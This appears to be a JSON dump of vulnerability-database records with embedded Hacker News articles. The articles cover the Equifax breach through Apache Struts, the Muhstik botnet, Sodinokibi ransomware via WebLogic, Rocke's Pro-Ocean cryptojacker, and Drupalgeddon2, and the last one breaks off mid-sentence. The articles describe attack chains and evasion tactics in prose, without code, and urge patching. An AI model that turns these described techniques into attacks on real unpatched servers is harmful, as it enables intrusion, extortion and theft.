"privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-14T00:00:00", "type": "attackerkb", "title": "CVE-2019-0230", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638", "CVE-2018-11776", "CVE-2019-0230"], "modified": "2020-11-17T00:00:00", "id": "AKB:289DC3CE-ED8A-4366-89F0-46E148584C36", "href": "https://attackerkb.com/topics/mcp2xl4Va9/cve-2019-0230", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-05-09T12:40:51", "description": "[](<https://thehackernews.com/images/-1V4miBZKvxA/W6OU7pQw5sI/AAAAAAAAyLM/GdXx9FNEs_UiDXCnBFucDDfdR_AGIzUkwCLcBGAs/s728-e100/equifax-data-breach.jpg>)\n\nAtlanta-based consumer credit reporting agency Equifax has been issued a \u00a3500,000 fine by the UK's privacy watchdog for its last year's [massive data breach](<https://thehackernews.com/2017/09/equifax-credit-report-hack.html>) that exposed personal and financial data of hundreds of millions of its customers. \n \nYes, \u00a3500,000\u2014that's the maximum fine allowed by the UK's Data Protection Act 1998, though the penalty is apparently a small figure for a $16 billion company. \n \nIn July this year, the UK's data protection watchdog issued the maximum allowed fine of [\u00a3500,000 on Facebook](<https://thehackernews.com/2018/07/facebook-cambridge-analytica.html>) over the [Cambridge Analytica scandal](<https://thehackernews.com/2018/03/facebook-cambridge-analytica.html>), saying the social media giant Facebook failed to prevent its citizens' data from falling into the wrong hands. \n \n\n\n## Flashback: The Equifax Data Breach 2017\n\n \nEquifax suffered a massive data breach last year between mid-May and the end of July, exposing highly [sensitive data of as many as 145 million people](<https://thehackernews.com/2017/10/equifax-credit-security-breach.html>) globally. \n \nThe stolen information included victims' names, dates of birth, phone numbers, driver's license details, addresses, and social security numbers, along with credit card information and personally identifying information (PII) for hundreds of thousands of its consumers. \n \nThe data breach occurred because the company failed to patch a [critical Apache Struts 2 vulnerability](<https://thehackernews.com/2017/09/equifax-apache-struts.html>) ([CVE-2017-5638](<https://thehackernews.com/2017/03/apache-struts-framework.html>)) on time, for which patches were already issued by the respected companies. \n \n\n\n## Why U.K. Has Fined a US Company?\n\n \nThe UK's Information Commissioner's Office (ICO), who launched a joint investigation into the breach with the Financial Conduct Authority, has now [issued](<https://ico.org.uk/about-the-ico/news-and-events/news-and-blogs/2018/09/credit-reference-agency-equifax-fined-for-security-breach/>) its largest possible monetary penalty under the country's Data Protection Act for the massive data breach\u2014\u00a3500,000, which equals to around $665,000. \n \nThe ICO said that although the [cyber attack compromised Equifax](<https://thehackernews.com/2017/09/equifax-data-breach.html>) systems in the United States, the company \"failed to take appropriate steps\" to protect the personal information of its 15 million UK customers. \n \nThe ICO investigation revealed \"multiple failures\" at the company like keeping users' personal information longer than necessary, which resulted in: \n\n\n * 19,993 UK customers had their names, dates of birth, telephone numbers and driving license numbers exposed.\n * 637,430 UK customers had their names, dates of birth and telephone numbers exposed.\n * Up to 15 million UK customers had names and dates of birth exposed.\n * Some 27,000 Britishers also had their Equifax account email addresses swiped.\n * 15,000 UK customers also had their names, dates of birth, addresses, account usernames and plaintext passwords, account recovery secret questions, and answers, obscured credit card numbers, and spending amounts stolen by hackers.\n \n\n\n## Breach Was Result of Multiple Failures at Equifax\n\n \nThe ICO said that Equifax had also been warned about a [critical Apache Struts 2 vulnerability](<https://thehackernews.com/2017/03/apache-struts-framework.html>) in its systems by the United States Department of Homeland Security (DHS) in March 2017, but the company did not take appropriate steps to fix the issue. \n \nInitially, it was also reported that the company kept news of the [breach hidden for a month](<https://thehackernews.com/2017/09/equifax-credit-report-hack.html>) after its internal discovery, giving three senior executives at Equifax time to sell almost $2 million worth of its shares, though the company denied such claims. \n \nSince the data breach happened before the EU's General Data Protection Regulation (GDPR) took effect in May 2018, the maximum fine of \u00a3500,000 imposed under the UK's old Data Protection Act 1998 is still lesser. \n \nThe penalty could have been much larger had it fallen under GDPR, wherein a company could face a [maximum fine of 20 million euros](<https://thehackernews.com/2017/08/data-breach-security-law.html>) or 4 percent of its annual global revenue, whichever is higher, for such a privacy breach. \n \nIn response to the ICO's penalty, Equifax said that the company has fully cooperated with the ICO throughout the investigation that it is \"disappointed in the findings and the penalty.\" \n \nEquifax received the Monetary Penalty Notice from the ICO on Wednesday and can appeal the penalty.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-09-20T13:54:00", "type": "thn", "title": "UK Regulator Fines Equifax \u00a3500,000 Over 2017 Data Breach", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2018-09-20T13:54:52", "id": "THN:AF93AEDBDE6169AD1163D53979A4EA04", "href": "https://thehackernews.com/2018/09/equifax-credit-reporting-breach.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-27T09:17:53", "description": "[](<https://4.bp.blogspot.com/-7t3BApLnYmI/WdM9FFq_vsI/AAAAAAAAATQ/KVrOmkm6SzoTm_8rLuSGnUbnhJudoRXwwCLcBGAs/s1600/equifax-data-breach.png>)\n\n[Equifax data breach](<https://thehackernews.com/2017/09/equifax-data-breach.html>) was bigger than initially reported, exposing highly sensitive information of more Americans than previously revealed. \n \nCredit rating agency Equifax says an additional 2.5 million U.S. consumers were also impacted by the massive data breach the company disclosed last month, bringing the total possible victims to 145.5 million from 143 million. \n \nEquifax last month announced that it had suffered a massive data breach that exposed highly sensitive data of hundreds of millions of its customers, which includes names, social security numbers, dates of birth and addresses. \n \nIn addition, credit card information for [nearly 209,000 customers](<https://thehackernews.com/2017/09/equifax-credit-report-hack.html>) was also stolen, as well as certain documents with personally identifying information (PII) for approximately 182,000 Equifax consumers. \n \nThe breach was due to a critical vulnerability ([CVE-2017-5638](<https://thehackernews.com/2017/03/apache-struts-framework.html>)) in Apache Struts 2 framework, which Apache patched over two months earlier (on March 6) of the security incident. \n \nEquifax was even [informed by the US-CERT](<https://thehackernews.com/2017/09/equifax-apache-struts.html>) on March 8 to patch the flaw, but the company failed to identified or patched its systems against the issue, Equifax ex-CEO Richard Smith said in a statement [[PDF](<http://docs.house.gov/meetings/IF/IF17/20171003/106455/HHRG-115-IF17-Wstate-SmithR-20171003.pdf>)] to the House Committee on Energy and Commerce. \n\n\n> \"It appears that the breach occurred because of both human error and technology failures,\" Smith said. \"Equifax's information security department also ran scans that should have identified any systems that were vulnerable to the Apache Struts issue...Unfortunately, however, the scans did not identify the Apache Struts vulnerability.\"\n\nIn the wake of the security incident, the company hired FireEye-owned security firm Mandiant to investigate the breach, which has now concluded the forensic portion of its investigation and plans to release the results \"promptly.\" \n \nMandiant said a total of 145.5 million consumers might now potentially have been [impacted by the breach](<https://thehackernews.com/2017/09/equifax-data-breach.html>), which is 2.5 million more than previously estimated. However, the firm did not identify any evidence of \"new attacker activity.\" \n\n\n> \"Mandiant did not identify any evidence of additional or new attacker activity or any access to new databases or tables,\" Equifax said in a Monday [press release](<https://investor.equifax.com/news-and-events/news/2017/10-02-2017-213238821>). \n\n> \"Instead, this additional population of consumers was confirmed during Mandiant's completion of the remaining investigative tasks and quality assurance procedures built into the investigative process.\"\n\nThe forensic investigation also found that approximately 8,000 Canadian consumers were also impacted, which is much lower than the 100,000 initially estimated figure by the credit rating and reporting firm. \n \nHowever, Equifax said that this figure \"was preliminary and did not materialize.\" \n \n\"I want to apologize again to all impacted consumers. As this important phase of our work is now completed, we continue to take numerous steps to review and enhance our cybersecurity practices,\" newly appointed interim CEO, Paulino do Rego Barros, Jr. said. \n \n\"We also continue to work closely with our internal team and outside advisors to implement and accelerate long-term security improvements.\" \n \nEquifax, which maintains data on over 820 million consumers and over 91 million businesses worldwide, also said the company would update its own notification by October 8 for its customers who want to check if they were among those affected by the data breach.\n", "cvss3": {}, "published": "2017-10-02T21:23:00", "type": "thn", "title": "Whoops, Turns Out 2.5 Million More Americans Were Affected By Equifax Breach", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-10-03T08:23:36", "id": "THN:ACD3479531482E2CA5A8E15EB6B47523", "href": "https://thehackernews.com/2017/10/equifax-credit-security-breach.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T09:17:16", "description": "[](<https://4.bp.blogspot.com/-YbGPFiDfo54/WMFEMrkhUUI/AAAAAAAArt0/axO9fhieprw6xBp0DoBNdECPB4t_le8uwCLcB/s1600/apache-struts-framework.png>)\n\nSecurity researchers have discovered a Zero-Day vulnerability in the popular Apache Struts web application framework, which is being actively exploited in the wild. \n \nApache Struts is a free, open-source, Model-View-Controller (MVC) framework for creating elegant, modern Java web applications, which supports REST, AJAX, and JSON. \n \nIn a [blog post](<http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>) published Monday, Cisco's Threat intelligence firm Talos announced the team observed a number of active attacks against the zero-day vulnerability (CVE-2017-5638) in Apache Struts. \n \nAccording to the researchers, the issue is a remote code execution vulnerability in the Jakarta Multipart parser of Apache Struts that could allow an attacker to execute malicious commands on the server when uploading files based on the parser. \n\n\n> \"It is possible to perform an RCE attack with a malicious Content-Type value,\" [warned](<https://cwiki.apache.org/confluence/display/WW/S2-045>) Apache. \"If the Content-Type value isn't valid an exception is thrown which is then used to display an error message to a user.\"\n\nThe vulnerability, documented at Rapid7's Metasploit Framework [GitHub site](<https://github.com/rapid7/metasploit-framework/issues/8064>), has been patched by Apache. So, if you are using the Jakarta-based file upload Multipart parser under Apache Struts 2, you are advised to upgrade to Apache Struts version 2.3.32 or 2.5.10.1 immediately. \n \n\n\n### Exploit Code Publicly Released\n\n \nSince the Talos researchers detected public proof-of-concept (PoC) exploit code (which was uploaded to a Chinese site), the vulnerability is quite dangerous. \n \nThe researchers even detected \"a high number of exploitation events,\" the majority of which seem to be leveraging the publicly released PoC that is being used to run various malicious commands. \n\n\n[](<https://2.bp.blogspot.com/-OMaYI0kDfZk/WME-W6XvmwI/AAAAAAAArtc/4rw52IxHjJYLJOlufdQEoxxQwjYWAbGmQCLcB/s1600/apache-exploit-code.png>)\n\nIn some cases, the attackers executed simple \"whoami\" commands to see if the target system is vulnerable, while in others, the malicious attacks turned off firewall processes on the target and dropped payloads. \n\n\n[](<https://2.bp.blogspot.com/-1fS7Z-ZsPgA/WME-E_vWvTI/AAAAAAAArtY/k_8FmAtSwaU9ICPEjN1gQMTdPHsQSRyFACLcB/s1600/apache-exploit.png>)\n\n \n\n\n> \"Final steps include downloading a malicious payload from a web server and execution of said payload,\" the researchers say. \"The payloads have varied but include an IRC bouncer, a DoS bot, and a sample related to the Bill Gates botnet... A payload is downloaded and executed from a privileged account.\"\n\nAttackers also attempted to gain persistence on infected hosts by adding a binary to the boot-up routine. \n \nAccording to the researchers, the attackers tried to copy the file to a benign directory and ensure_ \"that both the executable runs and that the firewall service will be disabled when the system boots.\"_ \n \nBoth Cisco and Apache researchers urge administrators to upgrade their systems to Apache Struts version 2.3.32 or 2.5.10.1 as soon as possible. Admins can also switch to a different [implementation](<https://cwiki.apache.org/confluence/display/WW/File+Upload#FileUpload-AlternateLibraries>) of the Multipart parser.\n", "cvss3": {}, "published": "2017-03-09T01:03:00", "type": "thn", "title": "New Apache Struts Zero-Day Vulnerability Being Exploited in the Wild", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-09T12:03:10", "id": "THN:2707247140A4F620671B33D68FEB1EA9", "href": "https://thehackernews.com/2017/03/apache-struts-framework.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2022-05-09T12:37:25", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEh09KugWf9Nll7KSG7yZBNIvMLXvLKZ92heAygg8X6PYa2oq5Gp7OARqFBSZyMbfZCsrcK9Mh72AhpOgxuEXhmjAynK6iRSEf_xMMAl_T0oqulTMyMrJgAc7PDPFVO0MuKFWRJessc_Iu5-Rm-QSXVXRVTrU_666K232IVvIKEiChh39TVtKy5BnyQY/s728-e100/redis.jpg>)\n\nMuhstik, a botnet infamous for propagating via web application exploits, has been observed targeting Redis servers using a recently disclosed vulnerability in the database system.\n\nThe vulnerability relates to [CVE-2022-0543](<https://nvd.nist.gov/vuln/detail/CVE-2022-0543>), a [Lua sandbox escape flaw](<https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce>) in the open-source, in-memory, key-value data store that could be abused to achieve remote code execution on the underlying machine. The vulnerability is rated 10 out of 10 for severity.\n\n\"Due to a packaging issue, a remote attacker with the ability to execute arbitrary Lua scripts could possibly escape the Lua sandbox and execute arbitrary code on the host,\" Ubuntu noted in an advisory released last month.\n\nAccording to [telemetry data](<https://blogs.juniper.net/en-us/security/muhstik-gang-targets-redis-servers>) gathered by Juniper Threat Labs, the attacks leveraging the new flaw are said to have commenced on March 11, 2022, leading to the retrieval of a malicious shell script (\"russia.sh\") from a remote server, which is then utilized to fetch and execute the botnet binaries from another server.\n\nFirst [documented](<https://blog.netlab.360.com/gpon-exploit-in-the-wild-i-muhstik-botnet-among-others-en/>) by Chinese security firm Netlab 360, Muhstik is known to be [active](<https://www.lacework.com/blog/meet-muhstik-iot-botnet-infecting-cloud-servers/>) since March 2018 and is monetized for carrying out coin mining activities and staging distributed denial-of-service (DDoS) attacks.\n\nCapable of self-propagating on Linux and IoT devices like GPON home router, DD-WRT router, and [Tomato routers](<https://unit42.paloaltonetworks.com/muhstik-botnet-attacks-tomato-routers-to-harvest-new-iot-devices/>), Muhstik has been spotted weaponizing a number of flaws over the years \u2013\n\n * [**CVE-2017-10271**](<https://nvd.nist.gov/vuln/detail/cve-2017-10271>) (CVSS score: 7.5) \u2013 An input validation vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware\n * [**CVE-2018-7600**](<https://nvd.nist.gov/vuln/detail/CVE-2018-7600>) (CVSS score: 9.8) \u2013 Drupal remote code execution vulnerability\n * [**CVE-2019-2725**](<https://nvd.nist.gov/vuln/detail/CVE-2019-2725>) (CVSS score: 9.8) \u2013 Oracle WebLogic Server remote code execution vulnerability\n * [**CVE-2021-26084**](<https://thehackernews.com/2021/09/atlassian-confluence-rce-flaw-abused-in.html>) (CVSS score: 9.8) \u2013 An OGNL (Object-Graph Navigation Language) injection flaw in Atlassian Confluence, and\n * [**CVE-2021-44228**](<https://thehackernews.com/2021/12/apache-log4j-vulnerability-log4shell.html>) (CVSS score: 10.0) \u2013 Apache Log4j remote code execution vulnerability (aka Log4Shell)\n\n\"This bot connects to an IRC server to receive commands which include the following: download files, shell commands, flood attacks, [and] SSH brute force,\" Juniper Threat Labs researchers said in a report published last week.\n\nIn light of active exploitation of the critical security flaw, users are highly recommended to move quickly to patch their Redis services to the latest version.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-28T06:59:00", "type": "thn", "title": "Muhstik Botnet Targeting Redis Servers Using Recently Disclosed Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271", "CVE-2018-7600", "CVE-2019-2725", "CVE-2021-26084", "CVE-2021-44228", "CVE-2022-0543"], "modified": "2022-03-28T06:59:18", "id": "THN:4DE731C9D113C3993C96A773C079023F", "href": "https://thehackernews.com/2022/03/muhstik-botnet-targeting-redis-servers.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:39", "description": "[](<https://thehackernews.com/images/-rIYNaeU1bb8/XMlFNdFL9_I/AAAAAAAAz4g/ioP3l5goEXYV6kwJvqgQXuChrtVFbUYJwCLcBGAs/s728-e100/ransomware-oracle-weblogic.jpg>)\n\nTaking advantage of newly disclosed and even patched vulnerabilities has become common among cybercriminals, which makes it one of the primary attack vectors for everyday-threats, like crypto-mining, phishing, and ransomware. \n \nAs suspected, a recently-disclosed critical vulnerability in the widely used Oracle WebLogic Server has now been spotted actively being exploited to distribute a never-before-seen ransomware variant, which researchers dubbed \"**Sodinokibi**.\" \n \nLast weekend, The Hacker News learned about a critical deserialization remote code execution [vulnerability in Oracle WebLogic Server](<https://thehackernews.com/2019/04/oracle-weblogic-hacking.html>) that could allow attackers to remotely run arbitrary commands on the affected servers just by sending a specially crafted HTTP request\u2014without requiring any authorization. \n \nTo address this vulnerability (CVE-2019-2725), which affected all versions of the Oracle WebLogic software and was given a severity score of 9.8 out of 10, Oracle rolled out an out-of-band [security update](<https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html>) on April 26, just a day after the vulnerability was made public and several in-the-wild attacks were observed. \n \nAccording to cybersecurity researchers from Cisco Talos' threat research team, an unknown group of hackers has been exploiting this vulnerability since at least April 25 to infect vulnerable servers with a new piece of ransomware malware. \n\n\n[](<https://thehackernews.com/images/-NyvdVA6dbaE/XMlHegXqUiI/AAAAAAAAz40/554Hulf2uwgF6Dk-2-fXKebGk63SdLVIgCLcBGAs/s728-e100/ransomware-oracle-weblogic.png>)\n\nSodinokibi is a dangerous ransomware variant which has been designed to encrypt files in a user's directory and then delete shadow copy backups from the system in an effort to prevent victims from recovering their data without paying a ransom. \n \n\n\n## No Interaction Required to Deploy Ransomware\n\n \nSince attackers are leveraging a remote code execution vulnerability in the WebLogic Server, unlike typical ransomware attacks, deploying the Sodinokibi ransomware requires no user interaction. \n \n\n\n> \"Historically, most varieties of ransomware have required some form of user interaction, such as a user opening an attachment to an email message, clicking on a malicious link, or running a piece of malware on the device,\" researchers explain in a [blog post](<https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html>). \n \n\"In this case, the attackers simply leveraged the Oracle WebLogic vulnerability, causing the affected server to download a copy of the ransomware from attacker-controlled IP addresses.\"\n\n \n \nOnce downloaded, the Sodinokibi ransomware encrypts the victim's systems and displays a ransom note demanding up to $2,500 in Bitcoin. The amount doubles to $5,000 if the ransom is not paid within a specified number of days\u2014which may vary from two days to six days. \n \n\n\n## Hackers Are Also Installing GandCrab Ransomware\n\n \nResearchers also noted that roughly eight hours after deploying Sodinokibi on an infected system, the attackers exploited the same WebLogic Server vulnerability to install another piece of ransomware known as [GandCrab](<https://thehackernews.com/2019/01/microsoft-gandcrab-ursnif.html>) (v5.2). \n\n\n[](<https://thehackernews.com/images/-MvaUSRB1IIk/XMlHYDSzrgI/AAAAAAAAz4o/bc94128mSTQz0yu0p92EhQ_ei9eWEiJkQCLcBGAs/s728-e100/ransomware-attack.png>)\n\n> \"We find it strange the attackers would choose to distribute additional, different ransomware on the same target,\" the researchers say. \"Sodinokibi being a new flavor of ransomware, perhaps the attackers felt their earlier attempts had been unsuccessful and were still looking to cash in by distributing Gandcrab.\"\n\n \nAttackers have been exploiting the Oracle WebLogic Server vulnerability in the wild since at least April 17 to distribute [cryptocurrency miners](<https://isc.sans.edu/diary/Update+about+Weblogic+CVE-2019-2725+%28Exploits+Used+in+the+Wild%2C+Patch+Status%29/24890>) and other [types of malware](<https://devcentral.f5.com/articles/oracle-weblogic-deserialization-remote-code-execution-34185>). \n \nWebLogic Server is a popular Java-based multi-tier enterprise application server typically used by businesses to support enterprise apps, which makes it an often target of attackers trying to carry out malicious operations, like running cryptocurrency miners and infecting with ransomware. \n \nOrganizations that use Oracle WebLogic Server should make sure to update their installations to the latest version of the software as soon as possible.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-05-01T07:23:00", "type": "thn", "title": "Hackers Found Exploiting Oracle WebLogic RCE Flaw to Spread Ransomware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2725"], "modified": "2019-05-01T07:31:20", "id": "THN:C3BFE86E2BE38F28D9CEB17AD2C50EBD", "href": "https://thehackernews.com/2019/05/ransomware-oracle-weblogic.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:09", "description": "[](<https://thehackernews.com/images/-QW-VuiqP65I/YBfiIyrUF2I/AAAAAAAABpg/3YIgJQiDql0yh7jOStv7rboKaQhJ5jHPQCLcBGAsYHQ/s0/malware.jpg>)\n\nA financially-motivated threat actor notorious for its cryptojacking attacks has leveraged a revised version of their malware to target cloud infrastructures using vulnerabilities in web server technologies, according to new research.\n\nDeployed by the China-based cybercrime group **Rocke**, the Pro-Ocean cryptojacking malware now comes with improved rootkit and worm capabilities, as well as harbors new evasion tactics to sidestep cybersecurity companies' detection methods, Palo Alto Networks' Unit 42 researchers [said](<https://unit42.paloaltonetworks.com/pro-ocean-rocke-groups-new-cryptojacking-malware/>) in a Thursday write-up.\n\n\"Pro-Ocean uses known vulnerabilities to target cloud applications,\" the researchers detailed. \"In our analysis, we found Pro-Ocean targeting Apache ActiveMQ ([CVE-2016-3088](<https://nvd.nist.gov/vuln/detail/CVE-2016-3088>)), Oracle WebLogic ([CVE-2017-10271](<https://nvd.nist.gov/vuln/detail/CVE-2017-10271>)) and Redis (unsecure instances).\"\n\n\"Once installed, the malware kills any process that uses the CPU heavily, so that it's able to use 100% of the CPU and mine Monero efficiently.\"\n\nFirst documented by [Cisco Talos](<https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html>) in 2018, Rocke has been found to distribute and execute crypto-mining malware using a varied toolkit that includes Git repositories and different payloads such as shell scripts, JavaScript backdoors, as well as portable executable files.\n\n[](<https://thehackernews.com/images/-zGuFNfU5HYA/YBfio2D1i3I/AAAAAAAABpo/peoOu7OnqKUPriJPrJfEV-QX12XX4jSRwCLcBGAsYHQ/s0/cyber.jpg>)\n\nWhile prior variants of the malware banked on the capability to target and remove cloud security products developed by Tencent Cloud and Alibaba Cloud by [exploiting flaws](<https://unit42.paloaltonetworks.com/malware-used-by-rocke-group-evolves-to-evade-detection-by-cloud-security-products/>) in Apache Struts 2, Oracle WebLogic, and Adobe ColdFusion, Pro-Ocean has expanded the breadth of those attack vectors by aiming at Apache ActiveMQ, Oracle WebLogic, and Redis servers.\n\nBesides its self-spreading features and better hiding techniques that allow it to stay under the radar and spread to unpatched software on the network, the malware, once installed sets about uninstalling monitoring agents to dodge detection and removing other malware and miners from the infected systems.\n\nTo achieve this, it takes advantage of a native Linux feature called LD_PRELOAD to mask its malicious activity, a library named [Libprocesshider](<https://github.com/gianlucaborello/libprocesshider>) to stay hidden, and uses a Python infection script that takes the machine's public IP to infect all machines in the same 16-bit subnetwork (e.g., 10.0.X.X).\n\nPro-Ocean also works to eliminate competition by killing other malware and miners, including Luoxk, BillGates, XMRig, and Hashfish, running on the compromised host. In addition, it comes with a watchdog module written in Bash that ensures persistence and takes care of terminating all processes that utilize more than 30% of the CPU with the goal of mining Monero efficiently.\n\n\"This malware is an example that demonstrates that cloud providers' agent-based security solutions may not be enough to prevent evasive malware targeted at public cloud infrastructure,\" Unit 42 researcher Aviv Sasson said. \"This sample has the capability to delete some cloud providers' agents and evade their detection.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-01T11:15:00", "type": "thn", "title": "New Cryptojacking Malware Targeting Apache, Oracle, Redis Servers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3088", "CVE-2017-10271"], "modified": "2021-02-01T11:15:16", "id": "THN:EEB3BA59922DDC6B345B8E6C153593DA", "href": "https://thehackernews.com/2021/02/new-cryptojacking-malware-targeting.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:40:36", "description": "[](<https://thehackernews.com/images/-zMSVUp45Ep4/WtcTP9bdJsI/AAAAAAAAwTg/e-HDb99w0307p9aEkp1TPTePjTvSe7JRQCLcBGAs/s728-e100/drupalgeddon-exploit.png>)\n\nThe Drupal vulnerability (CVE-2018-7600), dubbed [Drupalgeddon2](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>) that could allow attackers to completely take over vulnerable websites has now been exploited in the wild to deliver malware backdoors and cryptocurrency miners. \n \nDrupalgeddon2, a highly critical remote code execution vulnerability discovered two weeks ago in Drupal content management system software, was recently patched by the company without releasing its technical details. \n \nHowever, just a day after security researchers at Check Point and Dofinity published complete details, a Drupal